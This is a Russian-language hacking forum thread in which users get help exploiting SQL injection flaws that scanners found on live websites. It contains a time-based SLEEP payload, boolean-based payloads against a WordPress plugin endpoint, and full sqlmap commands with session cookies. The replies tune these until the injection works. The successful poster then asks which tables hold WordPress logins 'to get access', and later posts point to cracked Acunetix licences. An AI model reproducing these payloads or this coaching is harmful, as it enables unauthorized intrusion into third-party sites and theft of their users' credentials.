Вопрос по sql-inj

[russiadell]

Не сможешь подсказать как воспользоваться SQL иньекцией?

https://prnt.sc/tJByjdqi4hEe

Скопировал запрос с Invicti Professional Edition но нихрена не вывозит

Screenshot

Captured with Lightshot

prnt.sc

 

[c0d3x]

Не сможешь подсказать как воспользоваться SQL иньекцией?

https://prnt.sc/tJByjdqi4hEe

Скопировал запрос с Invicti Professional Edition но нихрена не вывозит

Screenshot

Captured with Lightshot

prnt.sc

Выложи в текстовом виде, весь запрос из нетспаркера и команду которую мапу подаешь, а то нихрена не понятно. Сайт разумеется на любой другой замени.

 

[r1ht3r]

Не сможешь подсказать как воспользоваться SQL иньекцией?

https://prnt.sc/tJByjdqi4hEe

Скопировал запрос с Invicti Professional Edition но нихрена не вывозит

Screenshot

Captured with Lightshot

prnt.sc

так sqlmap используй и всё) но булин будет дампить немного дольше,чем скули типа эррор,юнион.

 

[russiadell]

Выложи в текстовом виде, весь запрос из нетспаркера и команду которую мапу подаешь, а то нихрена не понятно. Сайт разумеется на любой другой замени.

GET /win/win_report.php?browser=&id_name=Smith&id_picture=3&reason=3%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f%20%2f*%20e681e3f6-6b1e-4040-89bf-7ba41c0b7eda%20*%2f&type_reason=bad%20quality HTTP/1.1
Host: site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=7bus9548am5medvhur7p4acqb2; mcountry=232; mtag=163; ratingv=4539+4533+4534+4525+4526+4533+4534+4525+4526+4527+4535+4536+4537+4538+4528+4529+; rating=335524+335518+335517+335516+335515+335514+335518+335515+335514+335510+335508+335255+334899+334297+334159+333783+332627+335513+335521+333170+333144+333120+333048+332969+332627+335523+335522+335520+335519+335507+335504+335503+335502+335501+335358+; zone-cap-3975288=368; d=true; light=disable; _ga=GA1.2.1169557514.1656014651; _gat=1; _gid=GA1.2.206783620.1656014651
Referer: https://site.com/win/win_report.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

sqlmap -u "https://site.com/win/win_report.php...picture=3&reason=test&type_reason=bad quality" -p "reason" --risk="3" --level="3" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --cookie="PHPSESSID=7bus9548am5medvhur7p4acqb2; mcountry=232; mtag=163; ratingv=4539+4533+4534+4525+4526+4533+4534+4525+4526+4527+4535+4536+4537+4538+4528+4529+; rating=335524+335518+335517+335516+335515+335514+335518+335515+335514+335510+335508+335255+334899+334297+334159+333783+332627+335513+335521+333170+333144+333120+333048+332969+332627+335523+335522+335520+335519+335507+335504+335503+335502+335501+335358+; zone-cap-3975288=368; d=true; light=disable; _ga=GA1.2.1169557514.1656014651; _gat=1; _gid=GA1.2.206783620.1656014651" --headers="Host:site.com\nAcceptext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nReferer:https://site.com/win/win_report.php" --dbms="MySQL" --batch

 

[dort]

Привет. У меня похожийий вопрос, напишу тут, что-бы не плодить темы.
Сразу предупреждаю, что я ламер.
Нашел Акунетикс, вот такого плана:

Спойлер: инфо

JSON input param was set to thankText' AND 3*3*9<(2*4) AND '000bkXM'='000bkXM

Tests performed:
thankText' AND 2*3*8=6*8 AND '000bkXM'='000bkXM => TRUE
thankText' AND 2*3*8=6*9 AND '000bkXM'='000bkXM => FALSE
thankText' AND 3*3<(2*4) AND '000bkXM'='000bkXM => FALSE
thankText' AND 3*2>(1*5) AND '000bkXM'='000bkXM => TRUE
thankText' AND 3*2*0>=0 AND '000bkXM'='000bkXM => TRUE
thankText' AND 3*3*9<(2*4) AND '000bkXM'='000bkXM => FALSE

POST /wp-content/plugins/hide-link-button/app/e.php HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Content-Length: 83
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Host: site.com
Connection: Keep-alive

{"route":"getSettings","param":"thankText' AND 3*3*9<(2*4) AND '000bkXM'='000bkXM"}

Запихнул его в Repeater Burp'a и проверил.
Действительно, если убрать кавычку, то меняется ответ, возвращается текст неведомой мне кодировки. Причем, где можно раскодировать этот текст - не знаю.
Подскажите, как мне скормить это sqlmap'у
Я просто скопировал запрос в файл, заменил уязвимый параметер на *
И запустил
sqlmap -r requests.txt Но он ничего не нашел...
Я так понимаю, надо как-то узнать какая дб на сервере, и указать ему dbms, что-бы он смог ее раскрутить

 

[c0d3x]

sqlmap -u "https://site.com/win/win_report.php?browser=&id_name=Smith&id_picture=3&reason=test&type_reason=bad quality" -p "reason" --risk="3" --level="3" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --cookie="PHPSESSID=7bus9548am5medvhur7p4acqb2; mcountry=232; mtag=163; ratingv=4539+4533+4534+4525+4526+4533+4534+4525+4526+4527+4535+4536+4537+4538+4528+4529+; rating=335524+335518+335517+335516+335515+335514+335518+335515+335514+335510+335508+335255+334899+334297+334159+333783+332627+335513+335521+333170+333144+333120+333048+332969+332627+335523+335522+335520+335519+335507+335504+335503+335502+335501+335358+; zone-cap-3975288=368; d=true; light=disable; _ga=GA1.2.1169557514.1656014651; _gat=1; _gid=GA1.2.206783620.1656014651" --headers="Host:site.com\nAcceptext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nReferer:https://site.com/win/win_report.php" --dbms="MySQL" --batch

Попробуй так:

sqlmap -u "https://site.com/win/win_report.php?browser=&id_name=Smith&id_picture=3&reason=3*&type_reason=bad%20quality" --dbs --dbms=MySQL --risk=3 --level=5 -v3 --random-agent

У тебя много хидеров разных, возможно из-за них не детектит. Будет предлагать установить куки - жми Y.

Привет. У меня похожийий вопрос, напишу тут, что-бы не плодить темы.
Сразу предупреждаю, что я ламер.
Нашел Акунетикс, вот такого плана:

Спойлер: инфо

JSON input param was set to thankText' AND 3*3*9<(2*4) AND '000bkXM'='000bkXM

Tests performed:
thankText' AND 2*3*8=6*8 AND '000bkXM'='000bkXM => TRUE
thankText' AND 2*3*8=6*9 AND '000bkXM'='000bkXM => FALSE
thankText' AND 3*3<(2*4) AND '000bkXM'='000bkXM => FALSE
thankText' AND 3*2>(1*5) AND '000bkXM'='000bkXM => TRUE
thankText' AND 3*2*0>=0 AND '000bkXM'='000bkXM => TRUE
thankText' AND 3*3*9<(2*4) AND '000bkXM'='000bkXM => FALSE

POST /wp-content/plugins/hide-link-button/app/e.php HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Content-Length: 83
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Host: site.com
Connection: Keep-alive

{"route":"getSettings","param":"thankText' AND 3*3*9<(2*4) AND '000bkXM'='000bkXM"}

Запихнул его в Repeater Burp'a и проверил.
Действительно, если убрать кавычку, то меняется ответ, возвращается текст неведомой мне кодировки. Причем, где можно раскодировать этот текст - не знаю.
Подскажите, как мне скормить это sqlmap'у
Я просто скопировал запрос в файл, заменил уязвимый параметер на *
И запустил
sqlmap -r requests.txt Но он ничего не нашел...
Я так понимаю, надо как-то узнать какая дб на сервере, и указать ему dbms, что-бы он смог ее раскрутить

POST https://site.com/wp-content/plugins/hide-link-button/app/e.php HTTP/1.1
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://site.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Host: site.com
Connection: Keep-alive

{"route":"getSettings","param":"thankText*"}

Такой запрос попробуй мапу скормить, именно что-бы между POST и HTTP/1.1 был полный линк, с https://site.com и без хидера Content-Length.

sqlmap -r req.txt --dbs --dbms=MySQL --risk=3 --level=5 -v3

 

[dort]

Сработало. Спасибо.
А не подскажете теперь, какие данные сливать из базы wordpress сайта, для того что-бы получить доступ?
А то слепая скуля, очень медленно крутит.
В каких табличках в вп обычно находятся заветные логин\пасс?

 

[c0d3x]

В каких табличках в вп обычно находятся заветные логин\пасс?

Структура БД WP: https://wp-staging.com/docs/the-wordpress-database-structure/

 

[dort]

Структура БД WP: https://wp-staging.com/docs/the-wordpress-database-structure/

Дай бог здоровья, тебе

 

[baztaxx]

WP DB Structure: https://wp-staging.com/docs/the-wordpress-database-structure/

where can i buy acunetix licence?

 

[th3tr0ll]

where can i buy acunetix licence?

There are various cracks available.
I heard good things about the one made by h0nus , you can find it in his telegram channel.

 

[c0d3x]

where can i buy acunetix licence?

https://xss.pro/threads/68783/ - latest version for windows + crack. The licensed version is not much different from the cracked one.

 

[luminous]

 

[c0d3x]

Скрытое содержимое

 

[luminous]

Скрытое содержимое